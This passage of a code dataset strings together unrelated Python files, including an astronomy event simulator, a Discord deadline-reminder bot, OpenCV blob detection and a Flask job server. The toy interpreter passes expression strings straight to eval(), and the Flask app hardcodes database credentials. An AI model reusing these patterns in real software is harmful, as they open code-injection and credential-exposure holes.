function to get its value\n value = fact()\n\n # Resolve the facts parent in the result structure whereas the path in\n # the structure is the facts file path relative to the base directory\n parent = data\n for part in fact_path.relative_to(type_path).parent.parts:\n parent = parent[part]\n\n # Store the facts value as child of the resolved parent\n parent[fact_path.name] = value\n\n # Format the final result structure using JSON and gzip-compress it\n result = gzip.compress(json.dumps(data).encode('utf-8'))\n\n # Announce the output using alfred\n with subprocess.Popen(['alfred',\n '-s', str(type_id)],\n stdin=subprocess.PIPE) as p:\n p.communicate(input=result)\n\n\nif __name__ == '__main__':\n 
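# walk the facts tree, run each fact snippet, then gzip the JSON result and announce it via alfred\n    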
main()\n","sub_path":"alfred/announce/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"433952131","text":"import numpy as np\nimport numpy.random as ra\nimport scipy.interpolate as sci\nfrom stingray import Lightcurve\nfrom stingray.gti import gti_border_bins\n\n\ndef simulate_times(lc, use_spline=False):\n \"\"\"\n Simulate an event list, by using the inverse CDF method:\n\n + Assume that the light curve is a probability density (must be positive\n definite)\n\n + Calculate the CDF from the cumulative sum, and normalize it from 0 to 1\n\n + Extract N random probability values from 0 to 1\n\n + Find the CDF values corresponding to these N values\n\n + Find the times corresponding to these N CDF values\n\n Parameters\n ----------\n lc: `Lightcurve` object\n The `counts` array of the light curve should be give the expected\n number of photons in that bin. For this reason, please note that the\n light curve should not contain any negative values, or this method will\n raise an exception.\n\n\n Other Parameters\n ----------------\n use_spline : bool\n Approximate the light curve with a spline to avoid binning effects\n\n Returns\n -------\n times : array-like\n Simulated photon arrival times\n\n Examples\n --------\n >>> t = [0.5, 1.5, 3.5]\n >>> c = [100] * 3\n >>> lc = Lightcurve(t, c, gti=[[0, 2], [3, 4]], dt=1.)\n >>> times = simulate_times(lc, use_spline=True)\n >>> np.all(np.diff(times) > 0) # Output array is sorted\n True\n >>> np.all(times >= 0.) # All times inside GTIs\n True\n >>> np.all(times <= 4.)\n True\n >>> np.any(times > 3.)\n True\n >>> np.any(times < 2.)\n True\n >>> np.any((times > 2.) & (times < 3.)) # No times outside GTIs\n False\n >>> lc.counts[0] = -3.\n >>> simulate_times(lc) # Test with one negative value in the lc\n Traceback (most recent call last):\n ...\n ValueError: simulate_times can only work with...\n \"\"\"\n return simulate_times_from_count_array(\n lc.time, lc.counts, lc.gti, lc.dt, use_spline=use_spline)\n\n\ndef simulate_times_from_count_array(time, counts, gti, dt, use_spline=False):\n \"\"\"Simulate an event list, by using the inverse CDF method.\n\n + Assume that the light curve is a probability density (must be positive\n definite)\n\n + Calculate the CDF from the cumulative sum, and normalize it from 0 to 1\n\n + Extract N random probability values from 0 to 1\n\n + Find the CDF values corresponding to these N values\n\n + Find the times corresponding to these N CDF values\n\n Parameters\n ----------\n time: array-like\n counts: array-like\n gti: [[gti00, gti01], ..., [gtin0, gtin1]]\n dt: float\n\n Other Parameters\n ----------------\n use_spline : bool\n Approximate the light curve with a spline to avoid binning effects\n\n Returns\n -------\n times : array-like\n Simulated photon arrival times\n\n Examples\n --------\n >>> t = [0.5, 1.5, 2.5, 3.5, 5.5]\n >>> c = [100] * 5\n >>> gti = [[0, 4], [5, 6]]\n >>> times = simulate_times_from_count_array(t, c, gti, 1, use_spline=True)\n >>> np.all(np.diff(times) > 0) # Output array is sorted\n True\n >>> np.all(times >= 0.) # All times inside GTIs\n True\n >>> np.all(times <= 6.)\n True\n >>> np.any(times > 5.)\n True\n >>> np.any(times < 4.)\n True\n >>> np.any((times > 4.) 
& (times < 5.)) # No times outside GTIs\n False\n >>> c[0] = -3.\n >>> simulate_times_from_count_array(t, c, gti, 1) # Test with one negative value in the lc\n Traceback (most recent call last):\n ...\n ValueError: simulate_times can only work with...\n \"\"\"\n time = np.asarray(time)\n counts = np.asarray(counts)\n gti = np.asarray(gti)\n kind = \"linear\"\n if use_spline and time.size > 2:\n kind = \"cubic\"\n\n if np.any(counts < 0):\n raise ValueError(\n \"simulate_times can only work with positive-definite light curves\"\n )\n\n if len(gti) > 1: # Work GTI by GTI, to avoid the spillover of events\n all_events = []\n start_bins, stop_bins = gti_border_bins(gti, time, dt=dt)\n for i, (start, stop) in enumerate(zip(start_bins, stop_bins)):\n new_events = simulate_times_from_count_array(\n time[start:stop],\n counts[start:stop],\n [gti[i]],\n dt,\n use_spline=use_spline)\n all_events.append(new_events)\n return np.concatenate(all_events)\n\n if len(counts) == 1: # Corner case: a single light curve bin\n dt = dt\n t0 = time[0] - dt / 2\n t1 = time[0] + dt / 2\n N = counts[0]\n return np.sort(np.random.uniform(t0, t1, N))\n\n tmin = gti[0, 0]\n tmax = gti[-1, 1]\n duration = (tmax - tmin)\n phase_bins = np.copy(time)\n phase_bins -= tmin\n phase_bins /= duration\n dph = dt / duration\n\n counts = np.concatenate(([0], counts))\n phase_bins = np.concatenate(\n ([0], phase_bins + dph / 2))\n n_events_predict = np.random.poisson(np.sum(counts))\n\n cdf = np.cumsum(counts, dtype=float)\n cdf -= cdf[0]\n cdf /= cdf[-1]\n\n inv_cdf_func = sci.interp1d(\n cdf,\n phase_bins,\n kind=kind)\n\n cdf_vals = np.sort(np.random.uniform(0, 1, n_events_predict))\n times = inv_cdf_func(cdf_vals)\n times *= duration\n times += tmin\n\n return times\n","sub_path":"stingray/simulator/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"275655934","text":"um_stack = []\r\nsymbols = {}\r\n\r\n\r\ndef evaluationExpr(expr): # otomatis\r\n return eval(expr)\r\n\r\n\r\ndef evalExpr(expr): # Manual\r\n expr = \",\" + expr\r\n i = len(expr) - 1\r\n num = \"\"\r\n while i >= 0:\r\n if expr[i] == \"+\" or expr[i] == \"-\" or expr[i] == \"/\" or expr[i] == \"*\" or expr[i] == \"%\":\r\n num = num[::-1]\r\n num_stack.append(num)\r\n num_stack.append(expr[i])\r\n num = \"\"\r\n elif expr[i] == \",\":\r\n num = num[::-1]\r\n num_stack.append(num)\r\n num = \"\"\r\n else:\r\n num += expr[i]\r\n i -= 1\r\n print(num_stack)\r\n\r\n\r\ndef doPrint(toPrint, sambung):\r\n if toPrint[0:6] == \"STRING\":\r\n toPrint = toPrint[8:]\r\n toPrint = toPrint[:-1]\r\n elif toPrint[0:3] == \"NUM\":\r\n toPrint = toPrint[4:]\r\n elif toPrint[0:4] == \"EXPR\":\r\n toPrint = evaluationExpr(toPrint[5:])\r\n\r\n if(sambung == 1):\r\n print(toPrint + ' ')\r\n else:\r\n print(toPrint)\r\n\r\n\r\ndef doSambung(toPrint):\r\n if toPrint[0:6] == \"STRING\":\r\n toPrint = toPrint[8:]\r\n toPrint = toPrint[:-1]\r\n elif toPrint[0:3] == \"NUM\":\r\n toPrint = toPrint[4:]\r\n elif toPrint[0:4] == \"EXPR\":\r\n toPrint = evaluationExpr(toPrint[5:])\r\n print(toPrint)\r\n\r\n\r\ndef doAssign(varName, varValue):\r\n symbols[varName[4:]] = varValue\r\n\r\n\r\ndef getVariabel(varname):\r\n varname = varname[4:]\r\n if varname in symbols:\r\n return symbols[varname]\r\n else:\r\n return \"Variabel \" + varname + \" VARIABEL BELUM DI DESKRIPSIKAN \"\r\n\r\n\r\ndef getInput(string, varname):\r\n i = input(string[1:-1])\r\n symbols[varname] = 
\"STRING:\\\"\" + i + \"\\\"\"\r\n","sub_path":"src/interpt.py","file_name":"interpt.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"247052098","text":"import cv2\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport imutils\nimport math\n\n\nos.chdir('C:/Users/Bruger/Documents/Uni/Abu dhabi/data/outdoor')\n\nprint('start')\n\nb=3\n\n# Read image\nimg = cv2.imread('pica36.png')\n\n\n#img = cv2.imread('blob.jpg')\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nblurred = cv2.medianBlur(gray, 9)\n_filter = cv2.bilateralFilter(blurred, 5, 75, 75)\nadap_thresh = cv2.adaptiveThreshold(_filter,\n 255,\n cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n cv2.THRESH_BINARY_INV,\n 21, 0)\n\nelement = cv2.getStructuringElement(cv2.MORPH_RECT, (3,3)) \ndilated = cv2.dilate(adap_thresh, element, iterations=1)\n\n# blob detection\nparams = cv2.SimpleBlobDetector_Params()\nparams.filterByColor = False\nparams.minThreshold = 80\nparams.maxThreshold = 93\nparams.blobColor = 0\nparams.minArea = 200\nparams.maxArea = 250\nparams.filterByCircularity = False\nparams.filterByConvexity = True\nparams.minCircularity =0.0000001\nparams.maxCircularity = 1\n\ndet = cv2.SimpleBlobDetector_create(params)\nkeypts = det.detect(dilated)\n\nim_with_keypoints = cv2.drawKeypoints(dilated,\n keypts,\n np.array([]),\n (0, 0, 255),\n cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\nres = cv2.drawKeypoints(img,\n keypts,\n np.array([]),\n (0, 0, 255 ),\n cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\ni = 0\nfor kp in keypts:\n print(\"(%f,%f)\"%(kp.pt[0],kp.pt[1]))\n i+=1\n cv2.rectangle(res,(int(kp.pt[0]),int(kp.pt[1])),(int(kp.pt[0])+1,int(kp.pt[1])+1),(0,255,0),2)\n\n#cv2.imshow(\"Keypoints\", im_with_keypoints)\ncv2.imshow(\"RES\", res)\ncv2.waitKey(0)","sub_path":"thor/old scripts/test45py.py","file_name":"test45py.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"295412914","text":"from model.bot_responses_model import *\n# from bot import *\nfrom utils.constants import FINISH_STATE\n\n\nclass FinishState:\n def handle_message(self, msg, bot):\n message = None\n if 'yes' in msg.get_text().lower():\n message = \"OK, let's play again, \\n Are u ready??\"\n bot.set_to_choose_artist_state()\n\n elif 'no' in msg.get_text().lower():\n message = return_user_message(FINISH_STATE)\n\n return message\n\n ","sub_path":"controller/states/finish_state.py","file_name":"finish_state.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"295767503","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 8 00:54:39 2019\n\n@author: datta\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport csv as csv\nimport matplotlib.pyplot as plt\nfrom stats import * \nclass Plot:\n def __init__(self, filename, x_axis, y_axis, filename2=None, x_axis2=None, y_axis2=None):\n self.filename = filename\n self.x_axis = x_axis\n self.y_axis = y_axis\n self.filename2 = filename2\n self.x_axis2 = x_axis2\n self.y_axis2 = y_axis2\n\n def LoadCsvAndPlot(self):\n readFile = pd.read_csv(self.filename)\n plt.plot(readFile[self.x_axis], readFile[self.y_axis])\n \n def LoadTwoCsvAndPlot(self):\n readfile1 = pd.read_csv(self.filename)\n readfile2 = pd.read_csv(self.filename2)\n plt.plot(readfile1[self.x_axis], readfile1[self.y_axis])\n 
plt.plot(readfile2[self.x_axis2], readfile2[self.y_axis2])\n\n def ShowPlot(self):\n plt.show()\n\n\n\"\"\"\nTest and Debug:\n\n#Create Ground truth file object and plot\nplot5 = Plot(\"CSVFiles/ground_truth.csv\", \"Easting\", \"Northing\")\nplot5.LoadCsvAndPlot()\nplot5.ShowPlot()\n\n\n#Husky odom\n\nplot4 = Plot(\"CSVFiles/husky_odom.csv\", \".pose.pose.position.x\", \".pose.pose.position.y\")\nplot4.LoadCsvAndPlot()\nplot4.ShowPlot()\n\n\n\n\nplot4 = Plot(\"CSVFiles/zed_odom.csv\", \".pose.pose.position.x\", \".pose.pose.position.y\")\nplot4.LoadCsvAndPlot()\nplot4.ShowPlot()\n\n\"\"\"\n\n\"\"\"\n#Create Gps file object and plot\nplot1 = Plot(\"CSVFiles/gps_fix.csv\", \".latitude\", \".longitude\", filename2=\"CSVFiles/ground_truth.csv\", x_axis2=\"Latitude\", y_axis2=\"Longitude\")\nplot1.LoadTwoCsvAndPlot()\nplot1.ShowPlot()\n\"\"\"\n\n\"\"\"\n#Create Gps file object and plot\nplot1 = Plot(\"CSVFiles/ground_truth.csv\", \"Easting\", \"Northing\", filename2=\"CSVFiles/bag/odometry-filtered.csv\", x_axis2=\".pose.pose.position.x\", y_axis2=\".pose.pose.position.y\")\nplot1.LoadTwoCsvAndPlot()\nplot1.ShowPlot()\n\"\"\"\n\n","sub_path":"robot_localization_masters_project/Plot.py","file_name":"Plot.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"427644472","text":"# Copyright (c) 2021 War-Keeper\n\"\"\"\nThis functionality provides various methods to manage reminders (in the form of creation, retrieval,\nupdation and deletion). An user can set up a reminder, check what is due this week or what is due\ntoday. He/She can also check all the due homeworks based on hte course name. An user can also update\nor delete a reminder if needed.\n\"\"\"\nimport discord\nfrom discord.ext import commands\nimport json\nimport os\nimport sys\nimport asyncio\nimport time\nfrom datetime import datetime\n\n\nclass Deadline(commands.Cog):\n \"\"\"Class provides several methods to manage remainders.\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n self.reminders = json.load(open(\"data/remindme/reminders.json\"))\n self.units = {\"second\": 1, \"minute\": 60, \"hour\": 3600, \"day\": 86400, \"week\": 604800,\n \"month\": 2592000}\n\n @commands.command(name=\"addhw\",\n help=\"add homework and due-date \"\n \"$addhw CLASSNAME HW_NAME MMM DD YYYY optional(HH:MM)\"\n \" ex. 
$addhw CSC510 HW2 SEP 25 2024 17:02\")\n async def duedate(self, ctx, coursename: str, hwcount: str, *, date: str):\n \"\"\"\n Adds the homework to json in the specified format.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n coursename: name of the course for which homework is to be added.\n hwcount: name of the homework\n date: due date of the assignment\n\n Returns:\n returns either an error stating a reason for failure or returns a success message\n indicating that the reminder has been added\n\n \"\"\"\n author = ctx.message.author\n try:\n duedate = datetime.strptime(date, '%b %d %Y %H:%M')\n # print(seconds)\n except ValueError:\n try:\n duedate = datetime.strptime(date, '%b %d %Y')\n except:\n await ctx.send(\"Due date could not be parsed\")\n return\n a_timedelta = duedate - datetime.today()\n seconds = (time.time() + a_timedelta.total_seconds())\n flag = True\n if self.reminders:\n for reminder in self.reminders:\n if ((reminder[\"COURSE\"] == coursename) and (reminder[\"HOMEWORK\"] == hwcount)):\n flag = False\n break\n if flag:\n self.reminders.append({\"ID\": author.id, \"COURSE\": coursename, \"HOMEWORK\": hwcount,\n \"DUEDATE\": str(duedate),\n \"FUTURE\": seconds})\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n json.dump(self.reminders, open(\"data/remindme/reminders.json\", \"w\"))\n await ctx.send(\n \"A date has been added for: {} homework named: {} which is due on: {} by {}.\".format(\n coursename,\n hwcount,\n str(duedate),\n author))\n else:\n await ctx.send(\"This homework has already been added..!!\")\n\n @duedate.error\n async def duedate_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\n 'To use the addhw command, do: $addhw CLASSNAME HW_NAME MMM DD YYYY optional(HH:MM)'\n ' \\n ( For example: $addhw CSC510 HW2 SEP 25 2024 17:02 )')\n\n @commands.command(name=\"deletereminder\", pass_context=True,\n help=\"delete a specific reminder using course name and homework name using\"\n \" $deletereminder CLASSNAME HW_NAME ex. 
$deletereminder CSC510 HW2 \")\n async def deleteReminder(self, ctx, courseName: str, hwName: str):\n \"\"\"\n Delete a reminder using Classname and Homework name.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n coursename: name of the course for which homework is to be added.\n hwName: name of the homework.\n\n Returns:\n returns either an error stating a reason for failure or returns a success message\n indicating that the reminder has been deleted.\n\n \"\"\"\n author = ctx.message.author\n to_remove = []\n for reminder in self.reminders:\n # print('in json '+str(reminder[\"HOMEWORK\"])+' hwName '+hwName)\n if ((reminder[\"HOMEWORK\"] == hwName) and (reminder[\"COURSE\"] == courseName)):\n # print('true '+hwName)\n to_remove.append(reminder)\n # print('to_remove '+ str(to_remove))\n for reminder in to_remove:\n self.reminders.remove(reminder)\n if to_remove:\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n json.dump(self.reminders, open(\"data/remindme/reminders.json\", \"w\"))\n await ctx.send(\n \"Following reminder has been deleted: Course: {},\"\n \" Homework Name: {}, Due Date: {}\".format(\n str(reminder[\"COURSE\"]), str(reminder[\"HOMEWORK\"]), str(reminder[\"DUEDATE\"])))\n\n @deleteReminder.error\n async def deleteReminder_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\n 'To use the deletereminder command, do: $deletereminder CLASSNAME HW_NAME'\n ' \\n ( For example: $deletereminder CSC510 HW2 )')\n\n @commands.command(name=\"changeduedate\", pass_context=True,\n help=\"update the assignment date. \"\n \"$changeduedate CLASSNAME HW_NAME MMM DD YYYY optional(HH:MM) \"\n \"ex. $changeduedate CSC510 HW2 SEP 25 2024 17:02 \")\n async def changeduedate(self, ctx, classid: str, hwid: str, *, date: str):\n \"\"\"\n Update the 'Due date' for a homework by providing the classname and homework name.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n classid: name of the course for which homework is to be added.\n hwid: name of the homework.\n date: due date of the assignment.\n\n Returns:\n returns either an error stating a reason for failure or returns a success message\n indicating that the reminder has been updated.\n\n \"\"\"\n author = ctx.message.author\n flag = False\n try:\n duedate = datetime.strptime(date, '%b %d %Y %H:%M')\n except ValueError:\n try:\n duedate = datetime.strptime(date, '%b %d %Y')\n except:\n await ctx.send(\"Due date could not be parsed\")\n return\n for reminder in self.reminders:\n flag = False\n if ((reminder[\"HOMEWORK\"] == hwid) and (reminder[\"COURSE\"] == classid)):\n reminder[\"DUEDATE\"] = str(duedate)\n a_timedelta = duedate - datetime.today()\n seconds = (time.time() + a_timedelta.total_seconds())\n reminder[\"FUTURE\"] = seconds\n reminder[\"ID\"] = author.id\n flag = True\n if flag:\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n json.dump(self.reminders, open(\"data/remindme/reminders.json\", \"w\"))\n await ctx.send(\n \"{} {} has been updated with\"\n \" following date: {}\".format(classid, hwid, reminder[\"DUEDATE\"]))\n\n @changeduedate.error\n async def changeduedate_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\n 'To use the changeduedate command, '\n 'do: $changeduedate CLASSNAME HW_NAME MMM DD YYYY optional(HH:MM) '\n '\\n ( For example: $changeduedate CSC510 HW2 
SEP 25 2024 17:02 )')\n\n @commands.command(name=\"duethisweek\", pass_context=True,\n help=\"check all the homeworks that are due this week $duethisweek\")\n async def duethisweek(self, ctx):\n \"\"\"\n Displays all homeworks that are due this week along with the coursename and due date.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n\n Returns:\n returns either an error stating a reason for failure or returns a list of all the\n assignments that are due this week.\n\n \"\"\"\n time = ctx.message.created_at\n for reminder in self.reminders:\n timeleft = datetime.strptime(reminder[\"DUEDATE\"], '%Y-%m-%d %H:%M:%S') - time\n print(\"timeleft: \" + str(timeleft) + \" days left: \" + str(timeleft.days))\n if timeleft.days <= 7:\n await ctx.send(\n \"{} {} is due this week at {}\".format(reminder[\"COURSE\"], reminder[\"HOMEWORK\"],\n reminder[\"DUEDATE\"]))\n\n @commands.command(name=\"duetoday\", pass_context=True,\n help=\"check all the homeworks that are due today $duetoday\")\n async def duetoday(self, ctx):\n \"\"\"\n Displays all the homeworks that are due today.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n\n Returns:\n returns either an error stating a reason for failure or returns a list of all the\n assignments that are due on the execution date of this command.\n\n \"\"\"\n flag = True\n for reminder in self.reminders:\n timedate = datetime.strptime(reminder[\"DUEDATE\"], '%Y-%m-%d %H:%M:%S')\n if timedate.date() == ctx.message.created_at.date():\n flag = False\n await ctx.send(\n \"{} {} is due today at {}\".format(reminder[\"COURSE\"], reminder[\"HOMEWORK\"],\n timedate.time()))\n if flag:\n await ctx.send(\"You have no dues today..!!\")\n\n @commands.command(name=\"coursedue\", pass_context=True,\n help=\"check all the homeworks that are due for a specific course \"\n \"$coursedue coursename ex. $coursedue CSC505\")\n async def coursedue(self, ctx, courseid: str):\n \"\"\"\n Displays all the homeworks that are due for a specific course.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n\n Returns:\n returns either an error stating a reason for failure or returns a list of all the\n assignments that are due for the provided course.\n\n \"\"\"\n course_due = []\n for reminder in self.reminders:\n if reminder[\"COURSE\"] == courseid:\n course_due.append(reminder)\n await ctx.send(\"{} is due at {}\".format(reminder[\"HOMEWORK\"], reminder[\"DUEDATE\"]))\n if not course_due:\n await ctx.send(\"Rejoice..!! 
You have no pending homeworks for {}..!!\".format(courseid))\n\n @coursedue.error\n async def coursedue_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\n 'To use the coursedue command, do: $coursedue CLASSNAME'\n ' \\n ( For example: $coursedue CSC510 )')\n\n @commands.command(name=\"listreminders\", pass_context=True, help=\"lists all reminders\")\n async def listreminders(self, ctx):\n \"\"\"\n Print out all the reminders.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n\n Returns:\n returns either an error stating a reason for failure or returns a list of all the\n assignments.\n\n \"\"\"\n to_remove = []\n for reminder in self.reminders:\n try:\n await ctx.send(\n \"{} homework named: {} which is due on: {} by {}\".format(reminder[\"COURSE\"],\n reminder[\"HOMEWORK\"],\n reminder[\"DUEDATE\"],\n self.bot.get_user(\n reminder[\"ID\"])))\n except (discord.errors.Forbidden, discord.errors.NotFound):\n to_remove.append(reminder)\n except discord.errors.HTTPException:\n pass\n else:\n to_remove.append(reminder)\n if not self.reminders:\n await ctx.send(\"Mission Accomplished..!! You don't have any more dues..!!\")\n\n @commands.command(name=\"clearreminders\", pass_context=True, help=\"deletes all reminders\")\n async def clearallreminders(self, ctx):\n \"\"\"\n Delete all the reminders.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n\n Returns:\n returns either an error stating a reason for failure or returns a\n success message stating that reminders have been deleted.\n\n \"\"\"\n to_remove = []\n for reminder in self.reminders:\n to_remove.append(reminder)\n for reminder in to_remove:\n self.reminders.remove(reminder)\n if to_remove:\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n json.dump(self.reminders, open(\"data/remindme/reminders.json\", \"w\"))\n await ctx.send(\"All reminders have been cleared..!!\")\n\n @commands.command(name=\"remindme\", pass_context=True,\n help=\"Request the bot to set a reminder for a due date\")\n async def remindme(self, ctx, quantity: int, time_unit: str, *, text: str):\n \"\"\"\n Personal remind me functionality.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n quantity: time after which the data will be erased\n\n Returns:\n returns either an error stating a reason for failure or\n returns a success message stating that reminders have been deleted.\n\n \"\"\"\n time_unit = time_unit.lower()\n author = ctx.message.author\n s = \"\"\n if time_unit.endswith(\"s\"):\n time_unit = time_unit[:-1]\n s = \"s\"\n if not time_unit in self.units:\n await ctx.send(\n \"Invalid unit of time. Select from seconds/minutes/hours/days/weeks/months\")\n return\n if quantity < 1:\n await ctx.send(\"Quantity must not be 0 or negative\")\n return\n if len(text) > 1960:\n await ctx.send(\"Text is too long.\")\n return\n\n seconds = self.units[time_unit] * quantity\n future = int(time.time() + seconds)\n\n self.reminders.append({\"ID\": author.id, \"FUTURE\": future, \"TEXT\": text})\n await ctx.send(\"I will remind you that in {} {}.\".format(str(quantity), time_unit + s))\n json.dump(self.reminders, open(\"data/remindme/reminders.json\", \"w\"))\n\n @commands.Cog.listener()\n async def on_command_error(self, ctx, error):\n \n \n await ctx.send(\n '\\nUnidentified command... 
Refer to $help to get the list of available commands')\n\n async def delete_old_reminders(self):\n \"\"\"\n asynchronously keeps on tracking the json file for expired reminders and cleans them.\n\n Parameters:\n\n Returns:\n return nothing as this is task to delete the old reminders.\n\n \"\"\"\n while self is self.bot.get_cog(\"Deadline\"):\n to_remove = []\n for reminder in self.reminders:\n if reminder[\"FUTURE\"] <= int(time.time()):\n try:\n print(\"Deleting an old reminder..!!\")\n except (discord.errors.Forbidden, discord.errors.NotFound):\n to_remove.append(reminder)\n except discord.errors.HTTPException:\n pass\n else:\n to_remove.append(reminder)\n for reminder in to_remove:\n self.reminders.remove(reminder)\n if to_remove:\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n json.dump(self.reminders, open(\"data/remindme/reminders.json\", \"w\"))\n await asyncio.sleep(5)\n\n\ndef check_folders():\n \"\"\"checks if the folder that is going to hold json exists else creates a new one.\"\"\"\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n if not os.path.exists(\"data/remindme\"):\n print(\"Creating data/remindme folder...\")\n os.makedirs(\"data/remindme\")\n\n\ndef check_files():\n \"\"\"checks if a json file exists else creates a new one\"\"\"\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n f = \"data/remindme/reminders.json\"\n print(\"Creating file...\")\n if not os.path.exists(f):\n print(\"Creating empty reminders.json...\")\n json.dump([], open(f, \"w\"))\n\n\ndef setup(bot):\n \"\"\"add the file to the bot's cog system\"\"\"\n check_folders()\n check_files()\n n = Deadline(bot)\n loop = asyncio.get_event_loop()\n loop.create_task(n.delete_old_reminders())\n bot.add_cog(n)\n","sub_path":"cogs/deadline.py","file_name":"deadline.py","file_ext":"py","file_size_in_byte":18128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"416340279","text":"from flask import Flask, jsonify\nfrom flask import make_response, abort, request\n#from flaskext.mysql import MySQL\nimport uuid\nimport threading\nimport time\nimport random\n\n#mysql = MySQL()\njobs = []\nlogs = []\norder_id = 0\nclass FlaskApp(Flask):\n def __init__(self, *args, **kwargs):\n super(FlaskApp, self).__init__(*args, **kwargs)\n self._activate_background_job()\n\n def _activate_background_job(self):\n def run_job():\n global jobs, order_id\n time.sleep(1)\n while True:\n # check if there is enough jobs in the job queue\n num = -1\n\n #con = mysql.connect()\n #cur = con.cursor()\n\n try:\n #cur.execute('''select * from rsd2018.jobs''')\n num = len(jobs)\n except Exception as e:\n err_str = \"Problem accesing sql: \" + str(e)\n print(err_str)\n\n #print(\"There are \" + str(num) + \" jobs in queue\")\n\n if num >= 0 and num < 20:\n # insert a new order in the system\n params = (\n random.randint(0, 4),\n random.randint(0, 3),\n random.randint(0, 2)\n )\n\n #what is all three are zero?\n if params[0] == 0 and params[1] == 0 and params[2] == 0:\n params = (1, 0, 0)\n\n try:\n #cur.execute(insert_stmt, params)\n #con.commit()\n job = {\"red\": params[0],\n \"blue\": params[1],\n \"yellow\":params[2],\n \"time\": time.time(),\n \"status\":1,\n \"order_id\": order_id}\n order_id += 1\n jobs.append(job)\n except Exception as e:\n err_str = \"Problem inserting jobs: \" + str(e)\n print(err_str)\n\n #cur.close()\n\n time.sleep(2)\n\n t1 = 
threading.Thread(target=run_job)\n            t1.start()\n\napp = FlaskApp(__name__)\n#app = Flask(__name__)\n\n\n# MySQL configurations\napp.config['MYSQL_DATABASE_USER'] = 'rsd'\napp.config['MYSQL_DATABASE_PASSWORD'] = 'rsd2018'\napp.config['MYSQL_DATABASE_DB'] = 'rsd2018'\napp.config['MYSQL_DATABASE_HOST'] = 'localhost'\n\nEventTypes = [\n    \"PML_Idle\",\n    \"PML_Execute\",\n    \"PML_Complete\",\n    \"PML_Held\",\n    \"PML_Suspended\",\n    \"PML_Aborted\",\n    \"PML_Stopped\",\n    \"Order_Start\",\n    \"Order_Done\"\n\t]\n\nStatusText = [\n    \"undefined\",\n    \"ready\",\n    \"taken\"\n    ]\n\n#mysql.init_app(app)\n\nclass InvalidUsage(Exception):\n    status_code = 400\n\n    def __init__(self, message, status_code=None, payload=None):\n        Exception.__init__(self)\n        self.message = message\n        if status_code is not None:\n            self.status_code = status_code\n        self.payload = payload\n\n    def to_dict(self):\n        rv = dict(self.payload or ())\n        rv['message'] = self.message\n        return rv\n\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n    response = jsonify(error.to_dict())\n    response.status_code = error.status_code\n    return response\n\n\n@app.errorhandler(404)\ndef not_found(error):\n    return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n@app.route('/')\ndef get_log():\n    global logs\n    return jsonify({'logs' : logs})\n\n\n\n@app.route('/log', methods=['POST'])\ndef postlog_entry():\n    global logs\n    if not request.json:\n        raise InvalidUsage('Missing json content', status_code=400)\n\n    if 'cell_id' in request.json:\n        if type(request.json['cell_id']) is not int:\n            raise InvalidUsage('cell_id type is not int', status_code=400)\n    else:\n        raise InvalidUsage('Missing cell_id in content', status_code=400)\n\n    if 'comment' in request.json:\n        if type(request.json['comment']) is not str:\n            raise InvalidUsage('comment type is not str', status_code=400)\n    else:\n        raise InvalidUsage('Missing comment in content', status_code=400)\n\n    if 'event' in request.json:\n        if type(request.json['event']) is not str:\n            raise InvalidUsage('event type is not str', status_code=400)\n    else:\n        raise InvalidUsage('Missing event in content', status_code=400)\n\n    event_str = request.json.get('event')\n\n    if event_str not in EventTypes:\n        raise InvalidUsage('event is 